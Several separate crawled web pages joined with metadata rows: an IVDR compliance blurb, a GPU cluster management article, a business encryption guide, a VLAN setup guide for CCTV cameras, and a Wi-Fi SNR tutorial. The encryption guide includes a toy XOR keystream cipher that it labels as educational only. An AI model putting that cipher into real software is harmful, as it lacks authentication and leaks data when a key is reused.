In the UK, the MHRA is already guiding suppliers and manufacturers on the new regulation. For example, the MHRA issued a guide for healthcare professionals which covers the application, administration, performance, and safety of IVDs, together with point-of-care testing and blood glucose meters. The In Vitro Diagnostic Device Regulation (IVDR) increases device safety by expanding the scope of the regulation and emphasizing clinical studies, device identification, and traceability. It also places emphasis on tracking device performance in the market, unannounced factory inspections, and increased involvement of notified bodies.
ISO 13485:2016 helps in meeting all of the new requirements, but only if it is implemented correctly. The organization should always be prepared by maintaining a state of audit readiness in order to pass an unannounced factory inspection.
To learn which documents are needed to comply with EU MDR, download this free white paper: EU MDR Checklist of Mandatory Documents.
As of June 2015, the second-fastest computer in the world, as measured by the Top500 list, employed NVIDIA® GPUs. Of the systems on the same list that use accelerators, 60% use NVIDIA GPUs. The performance kick provided by computing accelerators has pushed High Performance Computing (HPC) to new levels. When discussing GPU accelerators, the focus is often on the price-to-performance benefits to the end user. The true cost of managing and using GPUs goes far beyond the hardware price, however. Understanding and managing these costs helps provide more efficient and productive systems.
This is the first article in a series on managing GPU clusters. You can read the entire series or download the complete insideHPC Guide to Managing High Performance GPU Clusters courtesy of NVIDIA and Bright Computing.
The Advantages of GPU Accelerators
The use of NVIDIA GPUs in HPC has provided many applications an accelerated performance beyond what is possible with servers alone. In particular, the NVIDIA Tesla® line of GPUs is designed specifically for HPC processing. Offering up to 2.91 TFLOPS of double-precision (8.74 TFLOPS single-precision) processing with ECC memory, they can be added to almost any suitably equipped x86_64 or IBM Power 8 computing server.
With the support of the NVIDIA Corporation, an HPC software ecosystem has developed and created many applications, both commercial and open source, that take advantage of GPU acceleration. The NVIDIA CUDA® programming model, along with OpenCL and OpenACC compilers, has provided developers with the software tools needed to port and build applications in many areas, including computational fluid dynamics, molecular dynamics, bioinformatics, deep learning, electronic design automation, and others.
The Challenges Presented by GPU Accelerators
Any accelerator technology by definition is an addition over the baseline processor. In modern HPC environments, the dominant baseline architecture is x86_64 servers. Virtually all HPC systems use the Linux operating system (OS) and associated tools as a foundation for HPC processing. Both the Linux OS and underlying x86_64 processors are highly integrated and are heavily used in other areas outside of HPC — particularly web servers.
Virtually all GPU accelerators are added via the PCIe bus. (Note: NVIDIA has announced NVLink™, a high-bandwidth, energy-efficient interconnect that enables ultra-fast communication between the CPU and GPU, and between GPUs.) This arrangement provides a level of separation from the core OS/processor environment. The separation does not allow the OS to manage processes that run on the accelerator as if they were running on the main system. Even though accelerator processes are leveraged by the main processors, the host OS does not track memory usage, processor load, power usage, or temperatures for the accelerators. In one sense, the GPU is a separate computing domain with its own distinct memory and computing resources.
From a programming standpoint, the tools mentioned above provide an effective way to create GPU-based applications. In terms of management, however, the lack of direct access to the accelerator environment can lead to system-related concerns. In many cases, the default management approach is to assume GPUs are functioning correctly as long as applications seem to be working. Management information is often available separately using specific tools designed for the GPU. For instance, NVIDIA provides the nvidia-smi tool that can be used to examine the state of local accelerators. Monitoring GPU resources with tools like nvidia-smi and NVIDIA's NVML provides administrators with on-demand reports and data; however, information is often extracted using scripts and sent to a central collection location.
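A minimal sketch of that script-based collection pattern might look like the following. The canned sample imitates the CSV output of an `nvidia-smi --query-gpu=index,utilization.gpu,memory.used --format=csv,noheader,nounits` call so the sketch runs without a GPU; on a real node you would capture the command's output with subprocess instead.

```python
import csv
import io

# Sample text standing in for the stdout of an nvidia-smi CSV query,
# so this sketch can run on a machine with no GPU installed.
sample = "0, 87, 10240\n1, 12, 2048\n"

def parse_gpu_stats(text):
    rows = []
    for index, util, mem in csv.reader(io.StringIO(text)):
        rows.append({
            "gpu": int(index),                # int() tolerates the leading space
            "utilization_pct": int(util),
            "memory_used_mib": int(mem),
        })
    return rows

stats = parse_gpu_stats(sample)
print(stats)  # structured records, ready to forward to a central collector
```

Polling a parser like this on each node and shipping the records to one place is essentially what cluster-management tools automate for you.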
Another challenge facing GPU developers and administrators is the ongoing management of the software environments needed for proper operation. There are several reasons for this situation. First, new versions of the NVIDIA CUDA software and drivers may offer better performance or features not found in the previous version. These new capabilities may need to be tested on separate machines within the cluster infrastructure before they can be placed into production. Second, some HPC clusters may have multiple generations of GPU hardware in production and need to manage different kernel versions for specific hardware combinations. Both cluster provisioning and job scheduling must take these differences into account. And finally, there may be specific HPC applications that require specific kernel/driver/CUDA versions for proper operation.
These challenges often create administration issues or “headaches” when trying to manage HPC clusters. Each new combination of hardware and software creates both a monitoring and tool management challenge that often reduces the system throughput. Users and developers find managing tools tedious and error prone, while administrators need ways to make sure the applications are running successfully on the right hardware.
Creating a GPU Computing Resource
The advantages and challenges of GPU accelerators have presented users and vendors with the opportunity to develop a set of best practices for maximizing GPU resources. As will be described in this paper, there are sound strategies that will help minimize the issues mentioned above and keep users and administrators focused on producing scientific results. The goal is to transform a collection of independent hardware components and software tools into an efficiently managed production system.
Next week we’ll publish an article on ‘Best Practices for Maximizing GPU Resources in HPC Clusters’ including:
- Strategy 1: Provide a Unified System so Users/Developers can Focus on Results/Coding
- Strategy 2: Automate Updates
- Strategy 3: Manage User Environments
- Strategy 4: Provide Seamless Support for all GPU Programming Models
- Strategy 5: Plan for the Convergence of HPC and Big Data Analytics
- Strategy 6: Develop a Plan for Cloud-based GPU Processing
- Accelerated Science: GPU Cluster Case Study
If you prefer, you can download the complete insideHPC Guide to Managing GPU Clusters courtesy of NVIDIA and Bright Computing.
Every business operates with some level of encryption in its organization, but not many have documented standards for its use. Here's what you need to know about encryption to discover the "chinks in your armor" and to optimize your end-to-end encryption.
Encryption is a form of cryptography. It uses mathematical algorithms to scramble messages. Only individuals who possess the sender's key are able to decode the message.
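The idea can be sketched in a few lines of Python. This is an educational toy only: it derives a keystream from SHA-256 and XORs it with the message. Production systems should rely on a vetted, authenticated cipher such as AES-GCM from a maintained library, not a hand-rolled scheme like this.

```python
import hashlib
import secrets

# Educational sketch: build a keystream by hashing key+counter, then XOR
# it with the message. Without the key, the ciphertext is unreadable.
def keystream(key: bytes, length: int) -> bytes:
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])

def xor_crypt(key: bytes, data: bytes) -> bytes:
    # XOR is its own inverse, so the same call encrypts and decrypts.
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))

key = secrets.token_bytes(32)          # only holders of this key can decode
message = b"pay the invoice by Friday"
ciphertext = xor_crypt(key, message)

assert ciphertext != message           # scrambled without the key
assert xor_crypt(key, ciphertext) == message  # round-trips with the key
```

The same key must be kept secret and shared only with the intended recipient, which is exactly the key-management problem the rest of this article is about.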
Encryption Comes In Different Types
- Individual file and folder encryption -- encrypts specific items. This method should only be used when a few business documents are stored on a computer.
- Volume encryption -- this type creates a container that's fully encrypted. All files and folders created in or saved to that container are encrypted. OneDrive "Personal Vault" is an example of this.
- Full-disk or whole-disk encryption -- the most complete form of computer encryption. It's transparent to users and doesn't require them to save files to a special place on the disk – all files, folders and volumes are encrypted.
- End-to-end encryption -- while the other types above protect "data at rest," end-to-end encryption protects "data in transit." Its goal is to secure data at both ends while it's being communicated between users.
Microsoft BitLocker is a disk encryption tool included in Windows operating systems. It's designed to work with a Trusted Platform Module chip in your computer. That's where the encryption key is stored. It's possible to enable BitLocker without the chip, but a few settings must be configured and it requires admin privileges.
Go to Control Panel > BitLocker Drive Encryption.
Click “Turn on BitLocker” next to the drive you want to encrypt.
Enter a long and varied password.
IMPORTANT: Make a backup of the recovery key using one of the displayed methods.
Choose whether to encrypt used disk space only (faster) and start the encryption process.
When BitLocker is enabled, Microsoft will prompt you to save a copy of your recovery key. You need the recovery key to unlock your disk; without it, neither you nor anyone else can access the data. You can either print the key or save it to your Microsoft account or a file.
BitLocker also lets you require a PIN at startup.
Apple FileVault is built-in encryption for computers running Mac OS X.
Go to System Preferences > Security & Privacy > FileVault.
Click “Turn On FileVault…”
IMPORTANT: Make a note of the recovery key that is displayed and store it away from your Mac. You're prompted to save it in your iCloud account, but you can choose to write it down instead.
Wait for encryption to complete, but it’s OK to continue using the computer.
Less Than 50% Have End-to-End Encryption
Only communicating users can read the messages. In its simplest terms, that's what end-to-end encryption ensures. In theory, a third-party should not be able to decrypt messages that are protected by end-to-end encryption.
Encryption is a part of any organization's data protection policy. While most applications have encryption standards, many apps and services aren't required to comply with them.
As a result, knowledge workers end up sending some messages protected by end-to-end encryption while other messages they send are not.
One example of this is Microsoft Teams and Zoom.
Teams provides end-to-end encryption with 256-bit Advanced Encryption Standard (AES). It comes with your Office 365 license.
However, Zoom, being a stand-alone product, has yet to offer end-to-end encryption to all users.
An update in June on Zoom's blog says that end-to-end encryption services are currently being drafted and that the company has identified a path forward.
A Laptop is Stolen Every 53 Seconds
In the time it takes you to read this sentence, another laptop just got stolen. Even though media reports tend to focus on big data breaches orchestrated by anonymous hackers, physical device theft is still a legitimate concern for businesses.
According to many employee surveys, cars are the most popular place for device theft to occur.
Proper encryption of device drives will ensure that the damage done by a thief doesn't go beyond replacing the hardware.
How WiFi Encryption Works
Hopefully, business owners know that they need to password protect their WiFi network.
Having some level of encryption is better than none, but not all WiFi encryption is the same.
WEP, or "Wired Equivalent Privacy" was the first widely-used WiFi encryption method.
It became the standard back in 1999. However, as computing power has increased, WEP's flaws have become easier and easier to exploit.
Today, even novice hackers can crack WEP passwords in minutes using freely available software.
Around 2003, Wi-Fi Protected Access (WPA) became the answer to WEP's weaknesses.
Two of the major improvements with WPA were message integrity checks, that determine if an attacker has captured or altered packets passed between the access point and client, and the Temporal Key Integrity Protocol (TKIP). TKIP was the predecessor to the current Advanced Encryption Standard (AES).
WPA has been shown to be vulnerable to intrusion. Most hackers do not attack WPA directly; they instead go after Wi-Fi Protected Setup (WPS), a supplementary system designed to make it easy to link devices to modern access points.
In 2006, WPA was officially superseded by WPA2.
To crack WPA2, a hacker must already have access to the secured Wi-Fi network to then gain access to certain keys. Once the keys have been acquired, attacks can be made on other devices on the network.
While WPA2 is not completely secure, breaking into it requires experience and considerable effort.
Although the safest WiFi encryption option for your business is WPA2 + AES, every WiFi network should be treated as a legitimate security concern.
Running a secure email service is another area that organizations should take seriously.
Microsoft 365 emails are encrypted by default and do not require any additional third party services to do it.
There are some additional settings you should be aware of that can secure your email even more. If you're a business owner using Outlook, contact us to find out how to keep your email data secure.
Accessing PC and Server Data
Password protecting a computer does not mean that it can't be accessed.
Our security systems engineer, Joe Beineke explains it this way:
Encryption for Mobile Devices
If someone picked up your phone and started going through your photos and messages, you would feel vulnerable and awkward.
But your phone might be sharing your private data in the background all the time without your knowledge.
Here's how to encrypt your iPhone.
- Go to Settings > Touch ID & Passcode.
- Press “Turn Passcode On” if not already on.
- Press “Passcode options” to choose a custom numeric or alphanumeric code (recommended).
- Confirm your device is encrypted by scrolling to the bottom of the Settings > Touch ID & Passcode screen.
How to encrypt your Android device.
Plug in the device to charge the battery (required).
Make sure a password or PIN is set in Security > Screen lock.
Go to Settings > Security.
Press the “Encrypt phone” option.
Read the notice and press “Encrypt phone” to start the encryption process.
Remember to keep the phone plugged in until complete.
Encryption Best-Practices Summary
Encryption doesn't necessarily protect your system from weak network security controls. In other words, disk encryption is only a part of the protective suite, but a vital one.
Ironically, while encryption plays a key role in protecting your business from bad guys, it is also the main weapon used by hackers to infect your systems with ransomware.
- Don't assume that because your computer is password-protected it is encrypted.
- Work with your IT Support Provider to create an encryption standard across your organization.
- Use built-in encryption on your personal and work devices as a minimum defense whenever possible.
- Take extra precautions to secure your email communications.
- Use messenger and chat apps that provide end-to-end encryption.
Need help creating an encryption standard for your small business? | <urn:uuid:7f2088ff-6acc-4aab-aebc-f09b4b843bad> | CC-MAIN-2024-38 | https://www.goptg.com/blog/encryption | 2024-09-18T14:20:48Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651899.75/warc/CC-MAIN-20240918133146-20240918163146-00128.warc.gz | en | 0.932372 | 1,764 | 3.421875 | 3 |
VLAN configuration for CCTV is very important to protect the IP cameras against unauthorized access and also to separate the security camera system from other computers and devices that are connected to the IP network.
If you have layer 2 network switches such as Cisco, Netgear, HP, Dell, Dlink and others, they can be easily configured to be used on your CCTV system.
In this article, I will discuss the importance of VLANs for CCTV, how the technology works and how to do VLAN configuration for CCTV projects.
Let's start by learning the VLAN fundamentals, understanding how the technology is used on network switches, and learning how to set up VLANs for security cameras.
What are VLANs
VLAN is a technology used to segment networks by creating virtual groups.
It stands for Virtual Local Area Network and it is frequently used on network switches to create virtual groups that allow broadcast traffic control and also increase the security access level, thus avoiding unauthorized access.
On a switch it is possible to create VLANs and associate them to specific switch ports. Devices such as computers and IP cameras that are connected to the same group of ports will be able to communicate in the network.
VLAN traffic segregation
In a scenario with computers and CCTV cameras connected to the same switch it's possible to create VLANs to separate the broadcast traffic.
The diagram below shows an example of a network switch that has IP CCTV cameras and computers connected to its ports. Notice that the VLANs are created and represented by different names, IP address range, and colors.
In IT environments, network admins usually name VLANs using numbers and colors. In the picture above you can see VLAN 10 and VLAN 20 using the blue and green color respectively to represent different groups.
VLAN can increase the security in the network by assigning specific switch ports to groups. See the picture below where a man's laptop is connected to port 1 on the Blue VLAN and communicates with PC2 on port 3.
An intruder removes the IP camera from its cable on port 4 to connect his laptop and hack the network. He connects to the Green VLAN to try to hack the security camera but he can't have access to the rest of the network.
The same principle applies to the company worker, he can't have access to the security camera because it's connected to a different VLAN.
How VLAN TAGs work
To be able to control the traffic, a switch uses a TAG, which is just a way to mark the frames that enter or leave each port.
The frames coming into switch port 1 or 3 are tagged as part of VLAN 10, and frames coming into port 2 or 4 are tagged as part of VLAN 20.
The TAG can be different depending on the switch brand, however there's a universal TAG standard called 802.1Q that is used by most manufacturers.
See the picture below. When the frames come from the IP camera into the switch they are tagged; those tags are removed before the frames leave the switch.
See below the fields of the frame according to the universal 802.1Q standard:
SOURCE: source MAC address
DESTINATION: destination MAC address
TYPE & LEN: frame type and length
DATA: the data carried by the frame
FRAME CHECK: frame check sequence, used for error detection
See the illustration of the TAG that is inserted into the frame.
Communication between switches
When connecting two switches it is necessary to use a special port called "Trunk Port" or "Tagged Port" that will allow the traffic of all the VLANs to pass. So the frames with the 802.1Q TAGs will pass through this port.
Some manufacturers have slightly different VLAN port nomenclature. Cisco switch documentation uses the term "Trunk Port" for those special ports, while other manufacturers such as Netgear, HP and Dell use the term "Tagged Port", but in any case all of them use 802.1Q TAGs.
Now the IP security cameras and the computers can send traffic from the first to the second switch and still keep the broadcast and security under control.
The first switch can tag the frames that come from the security camera and move them through the trunk (tagged ports) to the second switch.
Type of switches for VLAN configuration
For VLAN configuration it is necessary to use manageable layer 2 switches.
Each manufacturer has a different way to create and manage VLANs by using CLI (command line interface) or Web Interface. But in any case the setup is pretty similar and it's very easy to create and configure VLANs.
Example of VLAN configuration for CCTV
Let's take a look at a CCTV camera system with 4 desktops using VLAN 10, plus 3 IP cameras and 1 NVR using VLAN 20.
On this small CCTV project, the VLAN separates the corporate broadcast network traffic from the IP camera broadcast network traffic. See the diagram.
On this CCTV VLAN configuration the desktop users will not be able to have access to the IP cameras or NVR. So your security system is protected.
So, as you can see VLAN configuration for CCTV is very important to keep your system safe from hackers and intruders.
Creating VLANs on a cisco switch
As a quick example, let's see a VLAN configuration on an 8-port Cisco switch. The model is the Catalyst 2960 PD and it will be configured using the CLI:
USB to serial adapter
The serial cable is a special one used for Cisco Switches and the USB to serial adapter is a TrendNet TU-S9. You can find them on stores such as Amazon.
The console port at the left side of the switch will be used to connect a serial cable from a laptop. A CLI will be used to create and configure the VLANs
A software for CLI commands
After the USB to serial interface adapter connection is done, you need to set up the software that will be used for the CLI commands. I will use a free one called PuTTY. You can download it at https://www.putty.org
Windows serial port configuration
The software configuration is pretty simple: you just need to check which COM port Windows is using for the USB adapter. Just open the Windows Device Manager and look under "Ports (COM & LPT)". See the picture below.
PuTTY's serial port configuration must match the data shown in Windows; in this case COM5, speed 9600, data bits 8, stop bits 1 and parity none.
If the configuration is correct, after clicking "Open" you will see the CLI.
Create VLAN using the CLI
Creating VLANs using the CLI is very simple. In our example I will configure an 8-port Cisco Catalyst 2960 switch. See the steps below:
1. Create the VLAN 10
Open the CLI and execute a sequence of simple commands to get into configuration mode, create the VLAN 10 and give it the name "computers".
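For reference, the standard IOS commands for this step are:

Switch#conf t
Switch(config)#vlan 10
Switch(config-vlan)#name computers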
2. Assign the ports to the VLAN 10
After creating the VLAN it is time to assign the ports. Get into configuration mode (conf t), select the port range from 1 to 4 and assign it to VLAN 10.
Switch(config)#interface range fa0/1 - 4
Switch(config-if-range)#switchport access vlan 10
3. Create the VLAN 20
Execute the same sequence of simple commands. Just get into configuration mode, create the VLAN 20 and give it the name "cameras".
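Again, the standard IOS commands for this step are:

Switch#conf t
Switch(config)#vlan 20
Switch(config-vlan)#name cameras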
4. Assign the ports to the VLAN 20
The VLAN is created; now just make sure the switch is in configuration mode (conf t), select the port range from 5 to 8 and assign it to VLAN 20.
Switch(config)#interface range fa0/5 - 8
Switch(config-if-range)#switchport access vlan 20
5. Verify if the VLANs were correctly created
Now it's time to check if the VLANs were created and the ports were assigned. Just exit the configuration mode and use the command below:
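The standard IOS command for this is:

Switch#show vlan brief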
See the picture below with the result. It's possible to see that VLANs 10 and 20 were created with their correct names and the ports were assigned.
6. Save the configuration
Don't forget to save the configuration you just did. See the command below
Switch#copy running-config startup-config
Creating VLANs on a Netgear switch
Most switches, such as the Netgear Prosafe Smart series, allow you to configure VLANs using a Web interface, so the process is pretty simple and fast.
Now it will be an easy task to create a VLAN configuration for CCTV that works for your project with just a few clicks; it's something really easy to do.
Back to the previous example, let's create the VLAN 10 and VLAN 20 for computers and Security cameras respectively.
Using the browser interface to create VLANs
Creating the VLAN configuration for CCTV cameras is very simple: you just need to connect a UTP cable from the laptop to one of the switch's ports, open a web browser and follow the steps below:
1. Login using your credentials
Check your switch manual to find out what is the default IP address and login password or use the one you just created for your CCTV camera project.
2. Open the TAB to configure VLAN
Open the Switching TAB and click on "VLAN" and note that some VLANs are already created, so don't use the same VLAN ID for your project.
3. Create the VLAN for computers
On the configuration tab just create the ID 10 and give the VLAN a name, in our case that will be "Computers"
4. Set the untagged ports
Ports that are connected to IP cameras and computers are called untagged ports, meaning those devices are not bringing tagged frames to the ports, so it's necessary to open the Membership TAB and check the ports with a "U".
In our example, ports 1 to 4 must have the "U". See the picture below.
5. Repeat the process for VLAN 20
Create the VLAN, name it and set the untagged ports from 5 to 8
VLAN configuration for large CCTV projects
For larger CCTV projects it's just a matter of scaling the network: create the VLANs and configure the trunk ports (or tagged ports) between switches.
Just create the VLANs on both switches, use a UTP cable to connect them and configure those ports as trunk or tagged ports. See the diagram.
In this example, the blue computers can't broadcast or have access to the IP cameras or NVRs, so the surveillance network is safe from hackers or virus.
Configuring a Cisco Switch trunk
If you are using Cisco Switches on both ends of the network, just connect the cables to the port, let's say port 10 for example, make sure the switch is using the standard 802.1Q we discussed earlier and convert the port into a trunk.
The configuration is simple, just get into the port you want to use as a trunk and type the commands below:
Switch(config)#interface fastEthernet 0/10
Switch(config-if)#switchport trunk encapsulation dot1q
Switch(config-if)#switchport mode trunk
Configuring Netgear Switch tagged ports
As long as the switches are connected and the VLANs are created on both sides of the network, you just need to configure the tagged ports on them.
Go to the VLAN Membership TAB and tag the port you want to connect to the next switch with a "T", which stands for tagged. In our example it is port 10.
Repeat the process for the VLAN 20 by tagging the same port
VLAN configuration for CCTV cameras is not rocket science.
VLAN can be used to secure and improve a CCTV system; it's just a question of switch installation and configuration. The switch's brand doesn't matter: as long as you have a manageable layer 2 device you can create the VLANs.
If you need a more advanced configuration, such as giving more than one computer access to different VLANs, then it's necessary to use a router or a layer 3 switch for inter-VLAN routing. But this is a topic for another article.
Want to learn more ?
If you want to become a professional CCTV installer or designer, take a look at the material available in the blog. Just click the links below:
Please share this information with your friends... | <urn:uuid:6b04b328-0337-4950-9068-af837563dd4d> | CC-MAIN-2024-38 | https://learncctv.com/the-use-of-vlans-in-cctv/ | 2024-09-19T21:05:24Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652067.20/warc/CC-MAIN-20240919194038-20240919224038-00028.warc.gz | en | 0.89165 | 2,596 | 2.53125 | 3 |
When performing an RF site survey, it’s important to define the range boundary of an access point based on signal-to-noise (SNR) ratio, which is the signal level (in dBm) minus the noise level (in dBm). For example, a signal level of -53 dBm measured near an access point and typical noise level of -90 dBm yields a SNR of 37 dB, a healthy value for wireless LANs. Don’t let the unit “dB” throw you—it merely represents a difference in two logarithmic values, such as dBm.
SNR impacts performance
The SNR of an access point signal, measured at the user device, decreases as range to the user increases because the applicable free space loss between the user and the access point reduces signal level. The same goes for the signals propagating from the user device to the access point. An increase in RF interference from microwave ovens and cordless phones, which increases the noise level, also decreases SNR.
SNR directly impacts the performance of a wireless LAN connection. A higher SNR value means that the signal strength is stronger in relation to the noise levels, which allows higher data rates and fewer retransmissions—all of which offers better throughput. Of course the opposite is also true. A lower SNR requires wireless LAN devices to operate at lower data rates, which decreases throughput. An SNR of 30 dB, for example, may allow an 802.11g client radio and access point to communicate at 24 Mbps; whereas, a SNR of 15 dB may only provide for 6 Mbps.
My company, Wireless-Nets, has performed extensive testing of wireless LANs at various SNR levels. For instance, we’ve run user-oriented tests to determine the impacts of SNR values on the ability for a user with a typical client radio (set to 30 mW) to associate with an 802.11b/g access point and load a particular webpage. For various SNRs, the following is what we found for the signal strength (found in the Windows connection status), association status, and performance when loading a particular Web page from a wireless laptop. We measured the SNR value from the same laptop and client radio using AirMagnet Analyzer. To ensure accurate comparisons, we cleared the laptop’s cache before reloading the page:
- > 40dB SNR = Excellent signal (5 bars); always associated; lightning fast.
- 25dB to 40dB SNR = Very good signal (3 – 4 bars); always associated; very fast.
- 15dB to 25dB SNR = Low signal (2 bars); always associated; usually fast.
- 10dB – 15dB SNR = Very low signal (1 bar); mostly associated; mostly slow.
- 5dB to 10dB SNR = No signal; not associated; no go.
These values seem consistent with testing we’ve done in the past, as well as what some of the vendors publish.
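To make the arithmetic concrete, here is a small Python sketch that computes SNR from signal and noise levels and maps it to the quality buckets from the tests above (the function names and labels are just for illustration):

```python
def snr_db(signal_dbm: float, noise_dbm: float) -> float:
    # SNR is simply the difference of two logarithmic levels, in dB.
    return signal_dbm - noise_dbm

def link_quality(snr: float) -> str:
    # Thresholds taken from the test results listed above.
    if snr > 40:
        return "excellent"
    if snr >= 25:
        return "very good"
    if snr >= 15:
        return "low"
    if snr >= 10:
        return "very low"
    return "no signal"

# The example from the opening paragraph: -53 dBm signal, -90 dBm noise.
print(snr_db(-53, -90), link_quality(snr_db(-53, -90)))  # 37 very good
```

Running the same check against a survey tool's readings is a quick way to sanity-check whether a given spot in the facility will deliver acceptable performance.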
Based on this testing, we recommend using around 20dB as the minimum SNR for defining the range boundary of each access point. That ensures a constant association with fairly good performance when performing typical network functions, such as Web browsing and e-mail synchronization. If you plan to deploy voice over a wireless LAN, then you’ll likely need a higher minimum SNR. For example, Cisco recommends 25 dB for their wireless voice telephony systems. Also, a larger margin (i.e., higher SNR), may be necessary in some venues, especially where there is a great deal of multipath signal propagation, such as manufacturing plants and where airplanes park at airports. Keep in mind that the corresponding level of performance only occurs at the boundary of each access point. Users associating with access points at closer range will have higher SNR and better performance.
When measuring SNRs, use the same client radio and antenna as the users will have if possible. A variance in antenna gain between the survey equipment and user device, for example, will likely result in users having a different SNR (and performance) than what you measured during the survey. Also, some client radios have better transmit power and receive sensitivity than others, which can throw off your results if you don’t use the same client radio as the users will have.
Changes made in the facility, such as the addition of walls and movement of large boxes, will affect SNR too. Thus, it's generally a good idea to recheck the SNR from time to time, even after the network is operational. This can be done easily with commercially-available tools. For example, the figure below is a screenshot taken from AirMagnet Survey, with the green and yellow colors indicating acceptable signal coverage areas of an 802.11g network with the tool set to a range boundary of 20 dB. If you find that the SNR is below the minimum value in some areas, such as the gray-shaded areas in the figure, consider installing additional access points or moving existing ones to better distribute the signals and fill in the holes.
The use of a particular SNR value as a requirement for signal coverage is certainly a good practice, and the rules of thumb given in this tutorial are a good starting point. Before making the system operational, however, always perform thorough verification testing of the applications, such as Web browsing, e-mail, and voice telephony, using typical client devices and radios that will actually utilize the network. This provides reassurance that the system will indeed satisfy coverage and performance requirements.
Jim Geier provides independent consulting services and training to companies developing and deploying wireless networks for enterprises and municipalities. He is the author of a dozen books on wireless topics, with recent releases including Deploying Voice over Wireless LANs (Cisco Press) and Implementing 802.1x Security Solutions (Wiley).
Article courtesy of Wi-Fi Planet | <urn:uuid:0853085d-29d8-4f81-8170-e75f60b73b36> | CC-MAIN-2024-38 | https://www.enterprisenetworkingplanet.com/standards-protocols/wi-fi-define-minimum-snr-values-for-signal-coverage/ | 2024-09-07T18:17:07Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00228.warc.gz | en | 0.929076 | 1,222 | 3.203125 | 3 |